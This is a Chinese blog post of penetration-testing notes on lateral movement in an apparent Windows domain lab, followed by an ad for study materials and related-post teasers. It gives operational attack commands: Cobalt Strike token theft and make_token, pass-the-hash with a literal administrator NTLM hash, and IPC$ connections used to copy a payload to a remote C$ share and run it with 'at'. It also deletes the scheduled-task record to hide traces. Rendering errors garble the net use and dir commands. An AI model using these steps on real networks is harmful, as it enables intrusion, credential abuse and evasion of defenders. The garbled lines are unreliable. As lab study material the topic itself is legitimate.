【渗透测试笔记】之【内网渗透——横向渗透(1)登录认证】_内网渗透system权限登录(1)

于 2024-05-13 11:05:48 发布
阅读量926 收藏 22
点赞数 14
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970385/article/details/138793815
版权
拓扑图

在这里插入图片描述

制作token

因为后续所需要进行的是内网渗透,这时候我们可以创建一个SMB的监听器,因为链接的Beacons 使用Windows 命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
在这里插入图片描述

方法1:偷取token

  1. 到进程中偷取token:
    在这里插入图片描述
  2. 右键要横向的主机,选择psexec64:
    在这里插入图片描述
  3. 选择一个已经获得的凭据或者勾选使用当前令牌,并选择监听器与会话即可:
    在这里插入图片描述

方法2:制作token

  1. 使用命令make_token domain\user password伪造一个token:
    在这里插入图片描述
  2. 访问dc的默认共享:
    在这里插入图片描述
散列认证

在获取到域管理员的ntml哈希以后,我们就可以通过pth获取域控制器的访问权限。

命令:pth domain\username ntml

  1. 复制已获得的ntml哈希:
    在这里插入图片描述
  2. 执行命令
    pth AA8J\Administrator e53549f6d914eae26ba644085e88097e
    在这里插入图片描述
  3. 访问默认共享:
    在这里插入图片描述
IPC 连接

IPC ( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。
通过 ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

  • 利用条件:

    • 开启了139、445端口;
    • 管理员开启了默认共享

  • 连接失败原因:

    • 用户名密码错误。
    • 目标没有打开ipc$默认共享。
    • 不能成功连接目标的139、445端口
    • 命令输入错误。

  1. 建立一个ipcKaTeX parse error: Undefined control sequence: \ipc at position 32: …use \\需要连接的IP地址\̲i̲p̲c̲ “密码” /user:账号`
    在这里插入图片描述

  2. 使用windows自带的工具获取远程主机信息:

    • dir命令
      在使用net use 命令与远程目标机器建立ipcKaTeX parse error: Expected group as argument to '\c' at end of input: …ir \\10.1.1.2\c`
      在这里插入图片描述

    • tasklist命令
      在使用net use 命令与远程目标机器建立ipc$后,可以未使用tasklist命令的/S参数列出远程主机上运行的进程。
      shell tasklist /S 10.1.1.2
      在这里插入图片描述

    • at命令
      at是Windows自带的用于创建计时任务的命令,它主要工作在Windows Server 2008 之前版本的操作系统中。使用at命令在远程目标机器上创建计划任务的流程大致如下。

      • 使用net time命令确定远程机器当前的系统时间。
        shell net time \\10.1.1.2\c$
        在这里插入图片描述

      • 使用copy 命令将Payload 文件上传到远程目标机器中。
        shell copy C:\Users\Administrator\Desktop\test_msf_local.exe \\10.1.1.2\c$
        在这里插入图片描述

      • 使用at 命令定时启动该Payload 文件。(记住任务ID)
        shell at \\10.1.1.2 11:24:00 c:\test_msf_local.exe
        在这里插入图片描述或者:shell at \\10.1.1.2 11:45:00 cmd.exe /c "payload
        到时间后主机则会执行程序并上线:
        在这里插入图片描述

      • 删除使用at 命令创建计划任务的记录。
        shell at \\10.1.1.2 2 /del
        在这里插入图片描述

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84970385
关注
  • 14
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
001-内网渗透(DOS命令:net use k: \ip\c$)
fiveseven的博客
08-21 1533
001-内网渗透(DOS命令:net use k: \ip\c$)
渗透测试 _ 内网信息收集1
08-03
内网信息收集是渗透测试的重要阶段,它决定了测试的效率和成功率。本文主要探讨了内网信息收集的基本概念和方法。 在内网渗透测试中,信息收集主要涉及三个关键步骤: 1. **我是谁?** 这个阶段的目标是识别控制的...
渗透测试笔记】之【内网渗透——横向渗透(1)登录认证
AA8j的博客
08-03 442
目录 文章目录目录拓扑图制作token散列认证IPC 连接 拓扑图 制作token 因为后续所需要进行的是内网渗透,这时候我们可以创建一个SMB的监听器,因为链接的Beacons 使用Windows 命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。 方法1:偷取token 到进程中偷取token: 右键要横向的主机,选择psexec64: 选择一个已经获得的凭据或者勾选使用当前令牌,并选择监听器与会话即可: 方法2:制作toke
内网渗透-内网横向移动的九种方式
最新发布
lza20001103的博客
04-14 1454
内网横向移动的九种方式
IPC$横向渗透代码实现
weixin_30662539的博客
02-16 493
思路 IPC$横向渗透的方法,也是病毒常用的扩散方法。 1、建立连接 2、复制文件到共享中C$、D$、E$、F$ 3、获取服务器的时间 3、设定计划任务按时间执行 用到的Windows API 建立网络驱动器 WNetAddConnection2() WNetAddConnection2W( _In_ LPNETRESOURCEW lpNetResource, ...
渗透笔记(7)
小向资源网博客
07-29 225
1、两种越权操作类型:横向越权操作和纵向越权操作。前者指的是攻击者尝试访问与他拥有相同权限的用户的资源;而后者指的是一个低级别攻击者尝试访问高级别用户的资源。 2、黑盒测试 fuzzing 模糊测试 权限攻击 流程攻击 灰盒测试 对关键部分代码进行审计 协议的加密解密 关键数据的解密 白盒测试 自动化工具审计 代...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
Python之渗透测试笔记(五) ——Requests模块
12-21
Requests模块是Python编程中用于发送HTTP请求的重要第三方库,它为开发者提供了简洁、直观的接口,使得处理HTTP请求...无论是在Web开发、自动化测试还是渗透测试中,Requests都能极大地简化网络数据的获取和处理过程。
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
读书笔记之python渗透测试.docx
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
渗透测试】内网横向
SunnyCat
11-29 266
https://mp.weixin.qq.com/s/hbuZwfxbcp7nhkxOUtsl2A 笔记
横向渗透之IPC横向
qq_46258964的博客
04-16 886
IPC横向 IPC(Internet Process Connection)共享命名管道的资源, 是为了实现进程间通信而开放的命名管道。 IPC可以通过验证用户名和密码获得相应的权限,使用139、445端口。 利用条件 1,目标主机开启了139和445端口 2,目标主机管理员开启了ipc$默认共享: 3,知道目标机的账号密码 建立IPC连接 建立IPC连接命令: net use \\172.16.1.132\ipc$ "password" /user:"Administrator" #工作组 net us
内网渗透之Token令牌窃取
qq_44029310的博客
08-05 2454
本文包括:令牌的基本概念和种类,以及在windows靶场环境下访问令牌的窃取利用。
Windos 内网渗透之Token的使用
qq_53742230的博客
07-31 573
windows 内网渗透中Token的运用
IPC$渗透使用
ddr12231的博客
09-26 238
来源:https://www.cnblogs.com/sstfy 简介 IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 使用条件 1.开放了139、445端口;2.目标开启ip...
内网安全:IPC协议横向移动
qq_61553520的博客
01-28 1882
本篇主要介绍内网横向移动的IPC协议利用方式,从命令,工具,脚本自动化多种方式讲解实战攻击思路
第六章-17 横向渗透
划水的小白白
12-05 472
一、定义 网上找到有段话很不错,摘抄过来。 二、信息收集 1.环境说明 环境说明:与socks那篇文章一样,或者说这是那篇文章的进阶 此时已经将MSF使用socks到win ser服务器。 2.具体操作 通过上篇文章讲解的,我们可以简单收集到另一台内网机器的IP为:192.168.228.131。 因为CS的信息收集毕竟是基础的,我们可以在msf中调用nmap对目标进行端口探测。 , 我们看到,目标开启了这么多的端口。 这些脚本都是MSF自带的。可以根据收集的信息去搜索一些相关漏洞进行攻击
DAY39:横向渗透
qq_49433473的博客
08-28 1780
哈希传递攻击概述(PTH) 、横向渗透横向移动工具合集使用及方法、Mimikatz 、Procdump+Mimikatz、psexec 、msf、CrackMapExec批量横向渗透、WMI 命令、Invoke-WmiCommand(PowerShell)
红蓝对抗:渗透测试实战与内网安全策略
本文档是一份详细的读书笔记,聚焦于红蓝对抗和渗透测试在网络安全建设中的应用,主要探讨了如何通过渗透测试来评估和加强内网安全。首先,文档概述了渗透测试的基本概念,即通过模拟攻击者行为,识别潜在的安全漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值